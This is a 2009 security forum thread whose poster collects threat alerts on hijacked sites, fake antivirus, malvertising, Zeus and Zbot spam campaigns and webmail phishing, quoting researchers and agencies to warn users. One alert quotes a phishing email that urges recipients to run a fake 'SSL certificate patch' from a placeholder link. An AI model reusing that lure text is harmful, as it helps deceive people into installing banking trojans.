2072 replies to this topic

[AplusWebMaster]

FYI...

PBS site hacked - used to serve exploits
- http://www.threatpos...ve-exploits-118
September 18, 2009 - "Some sections of the popular PBS.org Web site have been hijacked by hackers serving up a cocktail of dangerous exploits. According to researchers at Purewire*, attempts to access certain PBS Web site pages yielded JavaScript that serves exploits from a malicious domain via an iframe. The malicious JavaScript was found on the "Curious George" page that provides content on the popular animation series. A look at the code on the hijacked site shows malicious activity coming from a third-party .info domain. The URL serves exploits that target a variety of software vulnerabilities, including those in Acrobat Reader (CVE-2008-2992, CVE-2009-0927, and CVE-2007-5659), AOL Radio AmpX (CVE-2007-6250), AOL SuperBuddy (CVE-2006-5820) and Apple QuickTime (CVE-2007-0015)..."
* http://blog.purewire...-Serve-Exploits

[AplusWebMaster]

FYI...

Fake Twitter accounts for Fake AV
- http://www.f-secure....s/00001773.html
September 20, 2009 - "We're seeing more and more fake Twitter accounts being auto-generated by the bad boys. The profiles look real. They have variable account and user names (often German) and different locations (US cities). They even upload different Twitter wallpapers automatically... All the tweets sent by these accounts are auto-generated, either by picking up keywords from Twitter trends or by repeating real tweets sent by humans. And where do all the links eventually end up to? Of course, they lead to fake websites trying to scare you into purchasing a product you don't need..."

(Screenshots available at the URL above.)

- http://www.sophos.co...attack-twitter/
September 21, 2009

Edited by AplusWebMaster, 22 September 2009 - 06:37 AM.

[AplusWebMaster]

FYI...

Monopoly Game malware...
- http://securitylabs....lerts/3481.aspx
09.21.2009 - "Websense... discovered a new spam campaign that is targeting players of the Monopoly game. The Monopoly World Championships take place every four years, and Las Vegas is the host city of 2009. Because the Monopoly Regional Championships are going on all over the world and many Monopoly enthusiasts take part, the spammers utilize this chance to play their tricks. Our email honeypot systems detected over 30 thousand Monopoly spam messages on September 21, 2009 alone. The spam uses a social networking technique to "invite" you to play the online board game. It then provides a link to the fake Monopoly game download site, which in fact downloads a Trojan..."

(Screenshots available at the URL above.)

[AplusWebMaster]

FYI...

Fake Malwarebytes - Bogus Sponsored Link Leads to FAKEAV
- http://blog.trendmic...eads-to-fakeav/
Sep. 24, 2009 - "Apart from SEO poisoning, cybercriminals have found another avenue to proliferate FAKEAV malware - bogus sponsored links (sitio patrocinados in Spanish). Just recently, Trend Micro researchers were alerted to malicious search engine ads that appeared in Microsoft’s Bing and AltaVista, among others, when a user searches the string “malwarebytes.” (Malwarebytes is a free antivirus product, but of course, not a FakeAV.) Clicking the malicious URL points the user to an executable file named MalwareRemovalBot.exe-1 (detected by Trend Micro as TROJ_FAKEAV.DMZ). Upon execution, the rogue antivirus displays false information that the system is infected with files that do not even exist... In the past, cybercriminals employed the same tactic when it hitchhiked on Trend Micro. Some Google searches then showed banner ads that led to a fraudulent Trend Micro website. Though the ads may not appear in all regions, all users are still strongly advised to be extra careful when clicking links in search engines..."

(Screenshots available at the URL above.)

[AplusWebMaster]

FYI...

Malvertisements - weekend run...
- http://blog.scansafe...rtisements.html
September 24, 2009 - "Between Sep 19-21, malicious banner ads were served via multiple popular sites, including drudgereport.com, lyrics.com, horoscope.com and slacker.com. The ads delivered a trojan downloader using a variety of Adobe PDF exploits as well as the Microsoft ActiveX DirectShow exploit described in MS09-032. Detection of the malicious PDF is quite low, with only 3 out of 41 scanners detecting, as seen in this VirusTotal report*... Attackers use online ads for the same reasons a legitimate company would do so. When an attacker can infiltrate an advertising network, it enables them to reach a broad number of websites within a chosen category. This provides the attacker with the same return on investment that it would a legitimate advertiser – broad exposure to the audience of their choosing..."

- http://www.theregist...s_google_yahoo/
24 September 2009 - "... They were delivered over networks belonging to Google's DoubleClick; Right Media's Yield Manager (owned by Yahoo); and Fastclick, owned by an outfit called ValueClick... the payload installed Win32/Alureon, a trojan that drops a backdoor on infected machines... also appeared on slacker.com ..."

- http://www.virustota...023b-1253635686
File 201f338a343e02a41dc7a5344878b862 received on 2009.09.22 16:08:06 (UTC)
Current status: finished
Result: 3/41 (7.32%)

[AplusWebMaster]

FYI...

Fake IRS email SPAM - w/Zeus Trojan...
- http://www.computerw...l_virus_problem
September 25, 2009 - "Criminals are waging a nasty online campaign right now, hoping that their victims' fears of the tax collecter will lead them to inadvertently install malicious software. The spam campaign, entering its third week now, is showing no signs of slowing down, according to Gary Warner*, director of research in computer forensics with the University of Alabama at Birmingham. This one campaign accounts for about 10 percent of the spam e-mail that his group is presently tracking, he said... Since first spotting the spam on Sept. 9, antispam vendor Cloudmark has counted 11 million messages sent to the company's nearly 2 million desktop customers... What makes this campaign particularly ugly is that the malware that accompanies the fake IRS messages is a variant of the hard-to-detect Zeus Trojan. This software hacks into bank accounts and drains them of money as part of a widespread financial fraud scheme. Researchers estimate that the Zeus criminals are emptying more than a million dollars per day out of victims' bank accounts with the software. Small businesses have been particularly hard-hit by this fraud, because banks have sometimes held them accountable for the losses..."
* http://garwarner.blo...-continues.html

- http://blog.trendmic...other-irs-scam/

- http://www.irs.gov/p....html?portlet=1

- http://www.us-cert.g...reading_via_irs
September 28, 2009

Edited by AplusWebMaster, 28 September 2009 - 09:20 AM.

[AplusWebMaster]

FYI...

Phishing attacks reach record levels in Q2 2009
- http://www.markmonit...r090928-bji.php
September 28 2009 - "...
• During Q2 2009, phish attacks reached record levels with more than 151,000 unique attacks
• The average number of phishing attacks per organization also increased to record levels, with 351 attacks per organization, on average, in Q2 2009
• Social networking attacks continued to rise significantly, recording a 168% increase from the same period in 2008
• Brands in the financial and payment services industries are the most heavily-targeted industry categories for phishers, constituting 80 percent of all phish attacks in Q2 2009..."

[AplusWebMaster]

FYI...

Tropical Storm leads to FAKEAV
- http://blog.trendmic...eads-to-fakeav/
Sep. 29, 2008 - "Cybercriminals leveraged on the tropical storm, Ondoy (International name: Ketsana) that hit the Philippines and killed around 140 people... several malicious sites that appeared each time the users search the strings, “manila flood,” “Ondoy Typhoon,” and “Philippines Flood,” among others. The said sites emerged as one of the top search results. Once the user clicks the URL, they will be redirected to several landing pages where they are asked to download an EXE file, soft_207.exe. Trend Micro detects it as TROJ_FAKEAV.BND. This attack does GeoIP checks, which mean it only targets specific regions or location... Although riding on tragic events is not exactly new, what is notable is it employed once again blackhat SEO to lead users to a FAKEAV..."

(Screenshots available at the URL above.)

[AplusWebMaster]

FYI...

Rogue downloader uses Firefox warning screen lookalike
- http://sunbeltblog.b...ox-warning.html
September 29, 2009 - "... The rogue Alpha AntiVirus page used to hijack a browser copies the Firefox warning screen... Looks like the Firefox warning page ( in Internet Explorer ), but with a difference... What makes research on these rogues very challenging is the fact that they swap the download web sites about every six hours..."

(Screenshots available at the URL above.)

[AplusWebMaster]

FYI...

Fraudsters on social networking sites
- http://www.ic3.gov/m...009/091001.aspx
October 1, 2009 - "Fraudsters continue to hijack accounts on social networking sites and spread malicious software by using various techniques. One technique involves the use of spam to promote phishing sites, claiming there has been a violation of the terms of agreement or some other type of issue which needs to be resolved. Other spam entices users to download an application or view a video. Some spam appears to be sent from users' "friends", giving the perception of being legitimate. Once the user responds to the phishing site, downloads the application, or clicks on the video link, their computer, telephone or other digital device becomes infected. Another technique used by fraudsters involves applications advertised on social networking sites, which appear legitimate; however, some of these applications install malicious code or rogue anti-virus software. Other malicious software gives the fraudsters access to your profile and personal information. These programs will automatically send messages to your "friends" list, instructing them to download the new application too. Infected users are often unknowingly spreading additional malware by having infected Web sites posted on their Webpage without their knowledge. Friends are then more apt to click on these sites since they appear to be endorsed by their contacts..."

(Tips on avoiding these tactics available at the URL above.)

Edited by AplusWebMaster, 01 October 2009 - 10:35 PM.

[AplusWebMaster]

FYI...

Rogue AV growth 2009-H1 585 percent
- http://www.theregist...imeware_plague/
2 October 2009 - "The prevalence of scareware packages has reached epidemic proportions, with 485,000 different samples detected in the first half of 2009 alone. The figure is more than five times the combined figure for the whole of 2008, according to statistics from the Anti-Phishing Working Group (APWG). The huge figures are explained by the hacker practice of changing the checksum of every file. The tactic is designed to foil less sophisticated anti-malware defences... More than half (54 per cent) or 11.9 million of the computers scanned by Panda Security, which contributed to APWG's report, were infected with some form of malware. Banking trojan infections detected by the group almost tripled (up 186 per cent) between Q4 2008 and Q2 2009. APWG's report can be found here*."
* http://www.antiphish...ort_h1_2009.pdf

[AplusWebMaster]

FYI...

Hotmail user info leaked...
- http://blog.trendmic...rmation-leaked/
Oct. 6, 2009

Time to change your hotmail password
- http://isc.sans.org/...ml?storyid=7276
Last Updated: 2009-10-05 23:33:47 UTC - "... Microsoft has confirmed that thousands of Windows Live accounts have been compromised with their passwords posted online... Some information is posted here*..."
* http://windowslivewi...mp;sa=363915619
10/5/2009

[AplusWebMaster]

FYI...

Gmail, AOL, Yahoo all hit by webmail phishing scam
- http://www.theregist..._webmail_phish/
6 October 2009 - "Google has confirmed that Gmail has also been targeted by an "industry-wide phishing scheme" which first hit Hotmail accounts. Yahoo! and AOL are also reportedly affected. Hackers used fake websites to gain the login credentials attached to various webmail accounts. The attack emerged after a list of 30,000 purloined usernames and passwords was posted online. These leaked details reportedly referred to Gmail, Comcast and Earthlink accounts. A second list containing webmail addresses and passwords referring to Hotmail, Yahoo, AOL and Gmail also surfaced online. Some of the addresses on this list were old and fake, but at least some were genuine, the BBC reports*. Both lists have been taken offline, so are no longer directly accessible. The search engine giant confirmed that an unspecified number of accounts were compromised, adding that it had reset the passwords of the compromised accounts... The combined incidents serve to further illustrate the importance of password security. Using a different, hard-to-guess password on every site is a very good start in this direction."
* http://news.bbc.co.u...ogy/8292928.stm

- http://www.eset.com/...6/webmail-hacks
October 6, 2009 - "... If you receive an email telling you to provide your password it is a phish. That is as simple as it gets. Never give out your password..."

Edited by AplusWebMaster, 07 October 2009 - 03:01 AM.

[AplusWebMaster]

FYI...

FBI warns public of fraudulent SPAM email
- http://www.us-cert.g...stigation_warns
October 6, 2009 - "The Federal Bureau of Investigation (FBI) has released information warning the public about fraudulent email messages purporting to come from the FBI or the Department of Homeland Security. These email messages contain a malicious attachment that claims to provide an intelligence report or bulletin, but in reality attempts to launch malware on the user's system. More information regarding these messages can be found in the Federal Bureau of Investigation's New E-Scams and Warnings web site*. To help protect against this type of attack, US-CERT recommends that users avoid opening attachments contained in unsolicited email messages..."
* http://www.fbi.gov/c...vest/escams.htm

[AplusWebMaster]

FYI...

SSL SPAM... w/Zbot
- http://isc.sans.org/...ml?storyid=7333
Last Updated: 2009-10-13 13:13:34 UTC - "... started receiving SPAM messages along the following lines:
'On October 16, 2009 server upgrade will take place. Due to this the system may be offline for approximately half an hour. The changes will concern security, reliability and performance of mail service and the system as a whole. For compatibility of your browsers and mail clients with upgraded server software you should run SSl certificates update procedure. This procedure is quite simple. All you have to do is just to click the link provided, to save the patch file and then to run it from your computer location. That's all.
http ://evil-link/evil-file
Thank you in advance for your attention to this matter and sorry for possible inconveniences...'

UPDATE
the sample file we received was named patch.exe MD5=9abc553703f4e4fedb3ed975502a2c7a
ZBOT characteristics, so trojan, keylogger, disables AV.
http://www.threatexp...b3ed975502a2c7a
"... Trojan-Spy.Zbot.YETH - Trojan-Spy.Zbot.YETH is a rootkit trojan which steals online banking information and downloads other malware as well..."

... ThreatExpert on the file... http://www.threatexp...ddfd9c50b0015c9
"... Trojan-Spy.Zbot.YETH - Trojan-Spy.Zbot.YETH is a rootkit trojan which steals online banking information and downloads other malware as well..."
___

- http://blog.trendmic...ious-companies/
Oct. 14, 2009

Edited by AplusWebMaster, 14 October 2009 - 07:15 AM.